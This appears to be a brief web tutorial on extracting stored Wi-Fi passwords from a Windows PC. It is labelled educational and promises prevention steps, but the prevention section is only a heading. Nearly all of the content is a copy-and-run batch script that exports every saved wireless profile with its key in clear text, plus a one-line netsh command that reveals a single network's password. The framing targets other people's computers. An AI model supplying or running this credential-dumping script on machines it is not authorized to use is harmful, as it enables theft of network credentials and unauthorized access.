  • This hub is for educational purpose, it will show you how easy it is for some unauthorized person to access your WiFi if they gain access to your computer.
  • In the end of the article I've provided steps to prevent such attacks from happening to you
  • Please do not use this information for illegal purposes

How can you get the stored passwords ?

To get the passwords saved in his computer all you have to do is run these following code

@echo off
color 0a
set x=%~dp0
set x="%x%wifi"
echo %x%
md %x%
netsh wlan export profile key=clear folder='%x%'
powershell -Command "& {start '%x%' }"
pause >nul

copy the above code and save it in a file with .bat extension. Say filename.bat

now all you have to do is click on the file, it will save all the stored Wi-Fi networks and their passwords in xml files

If you open these xml file you can find the passwords of the corresponding networks inside the tags <keyMaterial>Password Here</keyMaterial>

Password in KeyMaterial tag
Password in KeyMaterial tag

The above code is used to save all the profiles stored in that system, If in case you only want to check the password of a single profile (WiFi Network) you can specify the name of the network as shown below.

Use the code below

netsh wlan show profile name="WiFi Network name" key=clear

Type this in a command prompt to get the Password associated with the WiFi Network

Password of wifi network

How to prevent someone from viewing your WiFi password
